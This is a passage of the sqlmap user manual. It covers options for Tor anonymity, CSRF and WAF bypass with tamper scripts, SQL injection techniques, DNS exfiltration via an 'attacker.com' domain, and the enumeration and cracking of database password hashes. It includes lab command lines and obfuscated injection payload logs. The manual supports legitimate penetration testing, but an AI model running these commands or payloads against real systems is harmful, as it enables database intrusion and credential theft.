643If, for any reason, you need to stay anonymous, instead of passing by a single predefined HTTP(S) proxy server, you can configure a [Tor client](http://www.torproject.org/) together with [Privoxy](http://www.privoxy.org) (or similar) on your machine as explained in [Tor installation guides](https://www.torproject.org/docs/installguide.html.en). Then you can use a switch `--tor` and sqlmap will try to automatically set Tor proxy connection settings.
644
645In case that you want to manually set the type and port of used Tor proxy, you can do it with options `--tor-type` and `--tor-port` (e.g. `--tor-type=SOCKS5 --tor-port 9050`).
646
647You are strongly advised to use `--check-tor` occasionally to be sure that everything was set up properly. There are cases when Tor bundles (e.g. Vidalia) come misconfigured (or reset previously set configuration) giving you a false sense of anonymity. Using this switch sqlmap will check that everything works as expected by sending a single request to an official [Are you using Tor?](https://check.torproject.org/) page before any target requests. In case that check fails, sqlmap will warn you and abruptly exit.
648
649### Delay between each HTTP request
650
651Option: `--delay`
652
653It is possible to specify a number of seconds to hold between each HTTP(S) request. The valid value is a float, for instance `0.5` means half a second. By default, no delay is set.
654
655### Seconds to wait before timeout connection
656
657Option: `--timeout`
658
659It is possible to specify a number of seconds to wait before considering the HTTP(S) request timed out. The valid value is a float, for instance 10.5 means ten seconds and a half. By default **30 seconds** are set.
660
661### Maximum number of retries when the HTTP connection timeouts
662
663Option: `--retries`
664
665It is possible to specify the maximum number of retries when the HTTP(S) connection timeouts. By default it retries up to **three times**.
666
667### Randomly change value for given parameter(s)
668
669Option: `--randomize`
670
671It is possible to specify parameter names whose values you want to be randomly changed during each request. Length and type are being kept according to provided original values.
672
673### Filtering targets from provided proxy log using regular expression
674
675Option: `--scope`
676
677Rather than using all hosts parsed from provided logs with option `-l`, you can specify valid Python regular expression to be used for filtering desired ones.
678
679Example of valid syntax:
680
681```
682$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
683```
684
685### Avoid your session to be destroyed after too many unsuccessful requests
686
687Options: `--safe-url`, `--safe-post`, `--safe-req` and `--safe-freq`
688
689Sometimes web applications or inspection technology in between destroys the session if a certain number of unsuccessful requests is performed. This might occur during the detection phase of sqlmap or when it exploits any of the blind SQL injection types. Reason why is that the SQL payload does not necessarily returns output and might therefore raise a signal to either the application session management or the inspection technology.
690
691To bypass this limitation set by the target, you can provide any (or combination of) option:
692
693* `--safe-url`: URL address to visit frequently during testing.
694* `--safe-post`: HTTP POST data to send to a given safe URL address.
695* `--safe-req`: Load and use safe HTTP request from a file.
696* `--safe-freq`: Test requests between two visits to a given safe location.
697
698This way, sqlmap will visit every a predefined number of requests a certain _safe_ URL without performing any kind of injection against it.
699
700### Turn off URL encoding of parameter values
701
702Switch: `--skip-urlencode`
703
704Depending on parameter placement (e.g. GET) its value could be URL encoded by default. In some cases, back-end web servers do not follow RFC standards and require values to be send in their raw non-encoded form. Use `--skip-urlencode` in those kind of cases.
705
706# Bypass anti-CSRF protection
707
708Options: `--csrf-token` and `--csrf-url`
709
710Lots of sites incorporate anti-CSRF protection in form of tokens, hidden field values that are randomly set during each page response. sqlmap will automatically try to recognize and bypass that kind of protection, but there are options `--csrf-token` and `--csrf-url` that can be used to further fine tune it. Option `--csrf-token` can be used to set the name of the hidden value that contains the randomized token. This is useful in cases when web sites use non-standard names for such fields. Option `--csrf-url` can be used for retrieval of the token value from arbitrary URL address. This is useful if the vulnerable target URL doesn't contain the necessary token value in the first place, but it is required to extract it from some other location.
711
712### Force usage of SSL/HTTPS
713
714Switch: `--force-ssl`
715
716In case that user wants to force usage of SSL/HTTPS requests toward the target, he can use this switch. This can be useful in cases when urls are being collected by using option `--crawl` or when Burp log is being provided with option `-l`.
717
718### Evaluate custom python code during each request
719
720Option: `--eval`
721
722In case that user wants to change (or add new) parameter values, most probably because of some known dependency, he can provide to sqlmap a custom python code with option `--eval` that will be evaluated just before each request.
723
724For example:
725
726```
727$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b9238\
72820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"
729```
730
731Each request of such run will re-evaluate value of GET parameter `hash` to contain a fresh MD5 hash digest for current value of parameter `id`.
732
733## Optimization
734
735These switches can be used to optimize the performance of sqlmap.
736
737### Bundle optimization
738
739Switch: `-o`
740
741This switch is an alias that implicitly sets the following options and switches:
742
743* `--keep-alive`
744* `--null-connection`
745* `--threads=3` if not set to a higher value.
746
747
748Read below for details about each switch.
749
750### Output prediction
751
752Switch: `--predict-output`
753
754This switch is used in inference algorithm for sequential statistical prediction of characters of value being retrieved. Statistical table with the most promising character values is being built based on items given in `txt/common-outputs.txt` combined with the knowledge of current enumeration used. In case that the value can be found among the common output values, as the process progresses, subsequent character tables are being narrowed more and more. If used in combination with retrieval of common DBMS entities, as with system table names and privileges, speed up is significant. Of course, you can edit the common outputs file according to your needs if, for instance, you notice common patterns in database table names or similar.
755
756Note that this switch is not compatible with `--threads` switch.
757
758### HTTP Keep-Alive
759
760Switch: `--keep-alive`
761
762This switch instructs sqlmap to use persistent HTTP(s) connections.
763
764Note that this switch is incompatible with `--proxy` switch.
765
766### HTTP NULL connection
767
768Switch: `--null-connection`
769
770There are special HTTP request types which can be used to retrieve HTTP response's size without getting the HTTP body. This knowledge can be used in blind injection technique to distinguish `True` from `False` responses. When this switch is provided, sqlmap will try to test and exploit two different _NULL connection_ techniques: `Range` and `HEAD`. If any of these is supported by the target web server, speed up will come from the obvious saving of used bandwidth.
771
772These techniques are detailed in the white paper [Bursting Performances in Blind SQL Injection - Take 2 (Bandwidth)](http://www.wisec.it/sectou.php?id=472f952d79293).
773
774Note that this switch is incompatible with switch `--text-only`.
775
776### Concurrent HTTP(S) requests
777
778Option: `--threads`
779
780It is possible to specify the maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do.
781This feature relies on [multi-threading](http://en.wikipedia.org/wiki/Multithreading) concept and inherits both its pro and its cons.
782
783This features applies to the brute-force switches and when the data fetching is done through any of the blind SQL injection techniques. For the latter case, sqlmap first calculates the length of the query output in a single thread, then starts the multi-threading. Each thread is assigned to retrieve one character of the query output. The thread ends when that character is retrieved - it takes up to 7 HTTP(S) requests with the bisection algorithm implemented in sqlmap.
784
785The maximum number of concurrent requests is set to **10** for performance and site reliability reasons.
786
787Note that this option is not compatible with switch `--predict-output`.
788
789## Injection
790
791These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts.
792
793### Testable parameter(s)
794
795Options: `-p`, `--skip` and `--param-exclude`
796
797By default sqlmap tests all GET parameters and POST parameters. When the value of `--level` is >= **2** it tests also HTTP `Cookie` header values. When this value is >= **3** it tests also HTTP `User-Agent` and HTTP `Referer` header value for SQL injections. It is however possible to manually specify a comma-separated list of parameter(s) that you want sqlmap to test. This will bypass the dependence on value of `--level` too.
798
799For instance, to test for GET parameter `id` and for HTTP `User-Agent` only, provide `-p "id,user-agent"`.
800
801In case that user wants to exclude certain parameters from testing, he can use option `--skip`. That is especially useful in cases when you want to use higher value for `--level` and test all available parameters excluding some of HTTP headers normally being tested.
802
803For instance, to skip testing for HTTP header `User-Agent` and HTTP header `Referer` at `--level=5`, provide `--skip="user-agent,referer"`.
804
805There is also a possibility to exclude certain parameters from testing based on a regular expression run on their names. In those kind of cases user can use option `--param-exclude`.
806
807For instance, to skip testing for parameters which contain string `token` or `session` in their names, provide `--param-exclude="token|session"`.
808
809#### URI injection point
810
811There are special cases when injection point is within the URI itself. sqlmap does not perform any automatic test against URI paths, unless manually pointed to. You have to specify these injection points in the command line by appending an asterisk (`*`) (Note: Havij style `%INJECT HERE%` is also supported) after each URI point that you want sqlmap to test for and exploit a SQL injection.
812
813This is particularly useful when, for instance, Apache web server's [mod_rewrite](http://httpd.apache.org/docs/current/mod/mod_rewrite.html) module is in use or other similar technologies.
814
815An example of valid command line would be:
816
817```
818$ python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"
819```
820
821#### Arbitrary injection point
822
823Similar to URI injection point, asterisk (`*`) (Note: Havij style `%INJECT HERE%` is also supported) can also be used to point to the arbitrary injection point inside GET, POST or HTTP headers. Injection point can be specified by marking it inside the GET parameter value(s) provided with option `-u`, POST parameter value(s) provided with option `--data`, HTTP header value(s) provided with options `-H`, `--headers`, `--user-agent`, `--referer` and/or `--cookie`, or at generic place inside HTTP request loaded from file with option `-r`.
824
825An example of valid command line would be:
826
827```
828$ python sqlmap.py -u "http://targeturl" --cookie="param1=value1*;param2=value2"
829```
830
831### Force the DBMS
832
833Option: `--dbms`
834
835By default sqlmap automatically detects the web application's back-end database management system. sqlmap fully supports the following database management systems:
836
837* MySQL
838* Oracle
839* PostgreSQL
840* Microsoft SQL Server
841* Microsoft Access
842* IBM DB2
843* SQLite
844* Firebird
845* Sybase
846* SAP MaxDB
847* Informix
848* MariaDB
849* Percona
850* MemSQL
851* TiDB
852* CockroachDB
853* HSQLDB
854* H2
855* MonetDB
856* Apache Derby
857* Amazon Redshift
858* Vertica
859* Mckoi
860* Presto
861* Altibase
862* MimerSQL
863* CrateDB
864* Greenplum
865* Drizzle
866* Apache Ignite
867* Cubrid
868* InterSystems Cache
869* IRIS
870* eXtremeDB
871* FrontBase
872
873If for any reason sqlmap fails to detect the back-end DBMS once a SQL injection has been identified or if you want to avoid an active fingeprint, you can provide the name of the back-end DBMS yourself (e.g. `postgresql`). For MySQL and Microsoft SQL Server provide them respectively in the form `MySQL <version>` and `Microsoft SQL Server <version> `, where ` <version>` is a valid version for the DBMS; for instance `5.0` for MySQL and `2005` for Microsoft SQL Server.
874
875In case you provide `--fingerprint` together with `--dbms`, sqlmap will only perform the extensive fingerprint for the specified database management system only, read below for further details.
876
877Note that this option is **not** mandatory and it is strongly recommended to use it **only if you are absolutely sure** about the back-end database management system. If you do not know it, let sqlmap automatically fingerprint it for you.
878
879### Force the database management system operating system name
880
881Option: `--os`
882
883By default sqlmap automatically detects the web application's back-end database management system underlying operating system when this information is a dependence of any other provided switch or option. At the moment the fully supported operating systems are:
884
885* Linux
886* Windows
887
888It is possible to force the operating system name if you already know it so that sqlmap will avoid doing it itself.
889
890Note that this option is **not** mandatory and it is strongly recommended to use it **only if you are absolutely sure** about the back-end database management system underlying operating system. If you do not know it, let sqlmap automatically identify it for you.
891
892### Force usage of big numbers for invalidating values
893
894Switch: `--invalid-bignum`
895
896In cases when sqlmap needs to invalidate original parameter value (e.g. `id=13`) it uses classical negation (e.g. `id=-13`). With this switch it is possible to force the usage of large integer values to fulfill the same goal (e.g. `id=99999999`).
897
898### Force usage of logical operations for invalidating values
899
900Switch: `--invalid-logical`
901
902In cases when sqlmap needs to invalidate original parameter value (e.g. `id=13`) it uses classical negation (e.g. `id=-13`). With this switch it is possible to force the usage of boolean operations to fulfill the same goal (e.g. `id=13 AND 18=19`).
903
904### Force usage of random strings for invalidating values
905
906Switch: `--invalid-string`
907
908In cases when sqlmap needs to invalidate original parameter value (e.g. `id=13`) it uses classical negation (e.g. `id=-13`). With this switch it is possible to force the usage of random strings to fulfill the same goal (e.g. `id=akewmc`).
909
910### Turn off payload casting mechanism
911
912Switch: `--no-cast`
913
914When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of `NULL` values. That is being made to prevent any erroneous states (e.g. concatenation of `NULL` values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. `None` values are returned back).
915
916### Turn off string escaping mechanism
917
918Switch: `--no-escape`
919
920In cases when sqlmap needs to use (single-quote delimited) string values inside payloads (e.g. `SELECT 'foobar'`), those values are automatically being escaped (e.g. `SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114)`). That is being done because of two things: obfuscation of payload content and preventing potential problems with query escaping mechanisms (e.g. `magic_quotes` and/or `mysql_real_escape_string`) at the back-end server. User can use this switch to turn it off (e.g. to reduce payload size).
921
922### Custom injection payload
923
924Options: `--prefix` and `--suffix`
925
926In some circumstances the vulnerable parameter is exploitable only if the user provides a specific suffix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and suffix.
927
928Example of vulnerable source code:
929
930 $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
931
932To detect and exploit this SQL injection, you can either let sqlmap detect the **boundaries** (as in combination of SQL payload prefix and suffix) for you during the detection phase, or provide them on your own.
933
934For example:
935
936```
937$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php\
938?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"
939[...]
940```
941
942This will result in all sqlmap requests to end up in a query as follows:
943
944 $query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
945
946Which makes the query syntactically correct.
947
948In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide custom boundaries, but sometimes in real world application it is necessary to provide it when the injection point is within nested `JOIN` queries for instance.
949
950### Tamper injection data
951
952Option: `--tamper`
953
954sqlmap itself does no obfuscation of the payload sent, except for strings between single quotes replaced by their `CHAR()`-alike representation.
955
956This option can be very useful and powerful in situations where there is a weak input validation mechanism between you and the back-end database management system. This mechanism usually is a self-developed input validation routine called by the application source code, an expensive enterprise-grade IPS appliance or a web application firewall (WAF). All buzzwords to define the same concept, implemented in a different way and costing lots of money, usually.
957
958To take advantage of this option, provide sqlmap with a comma-separated list of tamper scripts and this will process the payload and return it transformed. You can define your own tamper scripts, use sqlmap ones from the `tamper/` folder or edit them as long as you concatenate them comma-separated as value of the option `--tamper` (e.g. `--tamper="between,randomcase"`).
959
960The format of a valid tamper script is as follows:
961
962~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ {.python}
963# Needed imports
964from lib.core.enums import PRIORITY
965
966# Define which is the order of application of tamper scripts against
967# the payload
968__priority__ = PRIORITY.NORMAL
969
970def tamper(payload):
971 '''
972 Description of your tamper script
973 '''
974
975 retVal = payload
976
977 # your code to tamper the original payload
978
979 # return the tampered payload
980 return retVal
981~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
982
983You can check valid and usable tamper scripts in the `tamper/` directory.
984
985Example against a MySQL target assuming that `>` character, spaces and capital `SELECT` string are banned:
986
987```
988$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
989tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
990
991[hh:mm:03] [DEBUG] cleaning up configuration parameters
992[hh:mm:03] [INFO] loading tamper script 'between'
993[hh:mm:03] [INFO] loading tamper script 'randomcase'
994[hh:mm:03] [INFO] loading tamper script 'space2comment'
995[...]
996[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
997[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
998[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
999[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
1000[...]
1001[hh:mm:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1002'
1003[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONC
1004AT(cHar(58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/
1005**/elsE/**/0/**/ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/info
1006rmation_schema.tables/**/group/**/bY/**/x)a)
1007[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
1008 HAVING clause' injectable
1009[...]
1010```
1011
1012## Detection
1013
1014These options can be used to customize the detection phase.
1015
1016### Level
1017
1018Option: `--level`
1019
1020This option requires an argument which specifies the level of tests to perform. There are **five** levels. The default value is **1** where limited number of tests (requests) are performed. Vice versa, level **5** will test verbosely for a much larger number of payloads and boundaries (as in pair of SQL payload prefix and suffix). The payloads used by sqlmap are specified in the textual file `xml/payloads.xml`. Following the instructions on top of the file, if sqlmap misses an injection, you should be able to add your own payload(s) to test for too!
1021
1022Not only this option affects which payload sqlmap tries, but also which injection points are taken in exam: GET and POST parameters are **always** tested, HTTP Cookie header values are tested from level **2** and HTTP User-Agent/Referer headers' value is tested from level **3**.
1023
1024All in all, the harder it is to detect a SQL injection, the higher the `--level` must be set.
1025
1026It is strongly recommended to higher this value before reporting to the mailing list that sqlmap is not able to detect a certain injection point.
1027
1028### Risk
1029
1030Option: `--risk`
1031
1032This option requires an argument which specifies the risk of tests to perform. There are **three** risk values. The default value is **1** which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also `OR`-based SQL injection tests.
1033
1034In some instances, like a SQL injection in an `UPDATE` statement, injecting an `OR`-based payload can lead to an update of all the entries of the table, which is certainly not what the attacker wants. For this reason and others this option has been introduced: the user has control over which payloads get tested, the user can arbitrarily choose to use also potentially dangerous ones. As per the previous option, the payloads used by sqlmap are specified in the textual file `xml/payloads.xml` and you are free to edit and add your owns.
1035
1036### Page comparison
1037
1038Options: `--string`, `--not-string`, `--regexp` and `--code`
1039
1040By default the distinction of a `True` query from a `False` one (rough concept behind boolean-based blind SQL injection vulnerabilities) is done by comparing the injected requests page content with the original not injected page content.
1041Not always this concept works because sometimes the page content changes at each refresh even not injecting anything, for instance when the page has a counter, a dynamic advertisement banner or any other part of the HTML which is rendered dynamically and might change in time not only consequently to user's input. To bypass this limit, sqlmap tries hard to identify these snippets of the response bodies and deal accordingly. Sometimes it may fail, that is why the user can provide a string (`--string` option) which **should** be present on original page (though it is not a requirement) **and** on all True injected query pages, but that it is **not** on the False ones. Instead of static string, the user can provide a regular expression (`--regexp` option). Alternatively, user can provide a string (`--not-string` option) which is **not** present on original page **and** not on all True injected query pages, but appears **always** on False ones.
1042
1043Such data is easy for an user to retrieve, simply try to inject into the affected parameter an invalid value and compare manually the original (not injected) page content with the injected wrong page content. This way the distinction will be based upon string presence or regular expression match.
1044
1045In cases when user knows that the distinction of a `True` query from a `False` one can be done using HTTP code (e.g. `200` for `True` and `401` for `False`), he can provide that information to sqlmap (e.g. `--code=200`).
1046
1047Switches: `--text-only` and `--titles`
1048
1049In cases when user knows that the distinction of a `True` query from a `False` one can be done using HTML title (e.g. `Welcome` for `True` and `Forbidden` for `False`), he can turn turn on title-based comparison using switch `--titles`.
1050
1051In cases with lot of active content (e.g. scripts, embeds, etc.) in the HTTP responses' body, you can filter pages (switch `--text-only`) just for their textual content. This way, in a good number of cases, you can automatically tune the detection engine.
1052
1053## Techniques
1054
1055These options can be used to tweak testing of specific SQL injection techniques.
1056
1057### SQL injection techniques to test for
1058
1059Option: `--technique`
1060
1061This option can be used to specify which SQL injection type to test for. By default sqlmap tests for **all** types/techniques it supports.
1062
1063In certain situations you may want to test only for one or few specific types of SQL injection thought and this is where this option comes into play.
1064
1065This option requires an argument. Such argument is a string composed by any combination of `B`, `E`, `U`, `S`, `T` and `Q` characters where each letter stands for a different technique:
1066
1067* `B`: Boolean-based blind
1068* `E`: Error-based
1069* `U`: Union query-based
1070* `S`: Stacked queries
1071* `T`: Time-based blind
1072* `Q`: Inline queries
1073
1074For instance, you can provide `ES` if you want to test for and exploit error-based and stacked queries SQL injection types only. The default value is `BEUSTQ`.
1075
1076Note that the string must include stacked queries technique letter, `S`, when you want to access the file system, takeover the operating system or access Windows registry hives.
1077
1078### Seconds to delay the DBMS response for time-based blind SQL injection
1079
1080Option: `--time-sec`
1081
1082It is possible to set the seconds to delay the response when testing for time-based blind SQL injection, by providing the `--time-sec` option followed by an integer. By default it's value is set to **5 seconds**.
1083
1084### Number of columns in UNION query SQL injection
1085
1086Option: `--union-cols`
1087
1088By default sqlmap tests for UNION query SQL injection technique using 1 to 10 columns. However, this range can be increased up to 50 columns by providing an higher `--level` value. See the relevant paragraph for more details.
1089
1090You can manually tell sqlmap to test for this type of SQL injection with a specific range of columns by providing the tool with the option `--union-cols` followed by a range of integers. For instance, `12-16` means tests for UNION query SQL injection by using 12 up to 16 columns.
1091
1092### Character to use to test for UNION query SQL injection
1093
1094Option: `--union-char`
1095
1096By default sqlmap tests for UNION query SQL injection technique using `NULL` character. However, by providing a higher `--level` value sqlmap will performs tests also with a random number because there are some corner cases where UNION query tests with `NULL` fail, whereas with a random integer they succeed.
1097
1098You can manually tell sqlmap to test for this type of SQL injection with a specific character by using option `--union-char` with desired character value (e.g. `--union-char 123`).
1099
1100### Table to use in FROM part of UNION query SQL injection
1101
1102Option: `--union-from`
1103
1104In some UNION query SQL injection cases there is a need to enforce the usage of valid and accessible table name in `FROM` clause. For example, Microsoft Access requires usage of such table. Without providing one UNION query SQL injection won't be able to perform correctly (e.g. `--union-from=users`).
1105
1106### DNS exfiltration attack
1107
1108Option: `--dns-domain`
1109
1110DNS exfiltration SQL injection attack is described in paper [Data Retrieval over DNS in SQL Injection Attacks](http://arxiv.org/pdf/1303.3047.pdf), while presentation of it's implementation inside sqlmap can be found in slides [DNS exfiltration using sqlmap](http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281).
1111
1112If user is controlling a machine registered as a DNS domain server (e.g. domain `attacker.com`) he can turn on this attack by using this option (e.g. `--dns-domain attacker.com`). Prerequisites for it to work is to run a sqlmap with `Administrator` privileges (usage of privileged port `53`) and that one normal (blind) technique is available for exploitation. That's solely the purpose of this attack is to speed up the process of data retrieval in case that at least one technique has been identified (in best case time-based blind). In case that error-based blind or UNION query techniques are available it will be skipped as those are preferred ones by default.
1113
1114### Second-order attack
1115
1116Options: `--second-url` and `--second-req`
1117
1118Second-order SQL injection attack is an attack where result(s) of an injected payload in one vulnerable page is shown (reflected) at the other (e.g. frame). Usually that's happening because of database storage of user provided input at the original vulnerable page.
1119
1120You can manually tell sqlmap to test for this type of SQL injection by using option `--second-order` with the URL address or `--second-req` with request file for sending to the server where results are being shown.
1121
1122## Fingerprint
1123
1124### Extensive database management system fingerprint
1125
1126Switches: `-f` or `--fingerprint`
1127
1128By default the web application's back-end database management system fingerprint is handled automatically by sqlmap. Just after the detection phase finishes and the user is eventually prompted with a choice of which vulnerable parameter to use further on, sqlmap fingerprints the back-end database management system and continues on with the injection by knowing which SQL syntax, dialect and queries to use to proceed with the attack within the limits of the database architecture.
1129
1130If for any instance you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error messages, you can provide the switch `--fingerprint`. sqlmap will perform a lot more requests and fingerprint the exact DBMS version and, where possible, operating system, architecture and patch level.
1131
1132If you want the fingerprint to be even more accurate result, you can also provide the switch `-b` or `--banner`.
1133
1134## Enumeration
1135
1136These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.
1137
1138### Retrieve all
1139
1140Switch: `--all`
1141
1142This switch can be used in situations where user wants to retrieve everything remotely accessible by using a single switch. This is not recommended as it will generate large number of requests retrieving both useful and unuseful data.
1143
1144### Banner
1145
1146Switch: `-b` or `--banner`
1147
1148Most of the modern database management systems have a function and/or an environment variable which returns the database management system version and eventually details on its patch level, the underlying system. Usually the function is `version()` and the environment variable is `@@version`, but this vary depending on the target DBMS.
1149
1150Example against an Oracle target:
1151
1152```
1153$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -\
1154-banner
1155
1156[...]
1157[xx:xx:11] [INFO] fetching banner
1158web application technology: PHP 5.2.6, Apache 2.2.9
1159back-end DBMS: Oracle
1160banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
1161```
1162
1163### Session user
1164
1165Switch: `--current-user`
1166
1167With this switch it is possible to retrieve the database management system's user which is effectively performing the query against the back-end DBMS from the web application.
1168
1169### Current database
1170
1171Switch: `--current-db`
1172
1173With this switch it is possible to retrieve the database management system's database name that the web application is connected to.
1174
1175### Server hostname
1176
1177Switch: `--hostname`
1178
1179With this switch it is possible to retrieve the database management system's hostname.
1180
1181Example against a MySQL target:
1182
1183```
1184$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
1185hostname
1186
1187[...]
1188[xx:xx:04] [INFO] fetching server hostname
1189[xx:xx:04] [INFO] retrieved: debian-5.0-i386
1190hostname: 'debian-5.0-i386'
1191```
1192
1193### Detect whether or not the session user is a database administrator
1194
1195Switch: `--is-dba`
1196
1197It is possible to detect if the current database management system session user is a database administrator, also known as DBA. sqlmap will return `True` if it is, vice versa `False`.
1198
1199### List database management system users
1200
1201Switch: `--users`
1202
1203When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the list of users.
1204
1205### List and crack database management system users password hashes
1206
1207Switch: `--passwords`
1208
1209When the session user has read access to the system table containing information about the DBMS users' passwords, it is possible to enumerate the password hashes for each database management system user. sqlmap will first enumerate the users, then the different password hashes for each of them.
1210
1211Example against a PostgreSQL target:
1212
1213```
1214$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
1215passwords -v 1
1216
1217[...]
1218back-end DBMS: PostgreSQL
1219[hh:mm:38] [INFO] fetching database users password hashes
1220do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
1221[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
1222what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
1223[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
1224do you want to use common password suffixes? (slow!) [y/N] n
1225[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
1226[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
1227[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
1228database management system users password hashes:
1229[*] postgres [1]:
1230 password hash: md5d7d880f96044b72d0bba108ace96d1e4
1231 clear-text password: testpass
1232[*] testuser [1]:
1233 password hash: md599e5ea7a6f7c3269995cba3927fd0093
1234 clear-text password: testpass
1235```
1236
1237Not only sqlmap enumerated the DBMS users and their passwords, but it also recognized the hash format to be PostgreSQL, asked the user whether or not to test the hashes against a dictionary file and identified the clear-text password for the `postgres` user, which is usually a DBA along the other user, `testuser`, password.
1238
1239This feature has been implemented for all DBMS where it is possible to enumerate users' password hashes, including Oracle and Microsoft SQL Server pre and post 2005.
1240
1241You can also provide the option `-U` to specify the specific user who you want to enumerate and eventually crack the password hash(es). If you provide `CU` as username it will consider it as an alias for current user and will retrieve the password hash(es) for this user.
1242
1243### List database management system users privileges
1244
1245Switch: `--privileges`
1246
1247When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the privileges for each database management system user. By the privileges, sqlmap will also show you which are database administrators.
1248
1249You can also provide the option `-U` to specify the user who you want to enumerate the privileges.
1250
1251If you provide `CU` as username it will consider it as an alias for current user and will enumerate the privileges for this user.
1252
1253On Microsoft SQL Server, this feature will display you whether or not each user is a database administrator rather than the list of privileges for all users.
1254
1255### List database management system users roles
1256
1257Switch: `--roles`
1258
1259When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the roles for each database management system user.
1260
1261You can also provide the option `-U` to specify the user who you want to enumerate the privileges.
1262
1263If you provide `CU` as username it will consider it as an alias for current user and will enumerate the privileges for this user.
1264
1265This feature is only available when the DBMS is Oracle.
1266
1267### List database management system's databases
1268
1269Switch: `--dbs`
1270
1271When the session user has read access to the system table containing information about available databases, it is possible to enumerate the list of databases.
1272
1273### Enumerate database's tables
1274
1275Switches and option: `--tables`, `--exclude-sysdbs` and `-D`
1276
1277When the session user has read access to the system table containing information about databases' tables, it is possible to enumerate the list of tables for a specific database management system's databases.
1278
1279If you do not provide a specific database with option `-D`, sqlmap will enumerate the tables for all DBMS databases.
1280
1281You can also provide the switch `--exclude-sysdbs` to exclude all system databases.
1282
1283Note that on Oracle you have to provide the `TABLESPACE_NAME` instead of the database name.
1284
1285### Enumerate database table columns
1286
1287Switch and options: `--columns`, `-C`, `-T` and `-D`
1288
1289When the session user has read access to the system table containing information about database's tables, it is possible to enumerate the list of columns for a specific database table. sqlmap also enumerates the data-type for each column.
1290
1291This feature depends on option `-T` to specify the table name and optionally on `-D` to specify the database name. When the database name is not specified, the current database name is used. You can also provide the `-C` option to specify the table columns name like the one you provided to be enumerated.
1292
1293Example against a SQLite target:
1294
1295```
1296$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -\
1297-columns -D testdb -T users -C name
1298[...]
1299Database: SQLite_masterdb
1300Table: users
1301[3 columns]
1302+---------+---------+
1303| Column | Type |
1304+---------+---------+
1305| id | INTEGER |
1306| name | TEXT |
1307| surname | TEXT |
1308+---------+---------+
1309```
1310
1311Note that on PostgreSQL you have to provide `public` or the name of a system database. That's because it is not possible to enumerate other databases tables, only the tables under the schema that the web application's user is connected to, which is always aliased by `public`.
1312
1313### Enumerate database management system schema
1314
1315Switches: `--schema` and `--exclude-sysdbs`
1316
1317User can retrieve a DBMS schema by using this switch. Schema listing will contain all databases, tables and columns, together with their respective types. In combination with `--exclude-sysdbs` only part of the schema containing non-system databases will be retrieved and shown.
1318
1319Example against a MySQL target:
1320
1321```
1322$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --s\
1323chema--batch --exclude-sysdbs
1324
1325[...]
1326Database: owasp10
1327Table: accounts
1328[4 columns]
1329+-------------+---------+
1330| Column | Type |
1331+-------------+---------+
1332| cid | int(11) |
1333| mysignature | text |
1334| password | text |
1335| username | text |
1336+-------------+---------+
1337
1338Database: owasp10
1339Table: blogs_table
1340[4 columns]
1341+--------------+----------+
1342| Column | Type |
1343+--------------+----------+
1344| date | datetime |
1345| blogger_name | text |
1346| cid | int(11) |
1347| comment | text |
1348+--------------+----------+
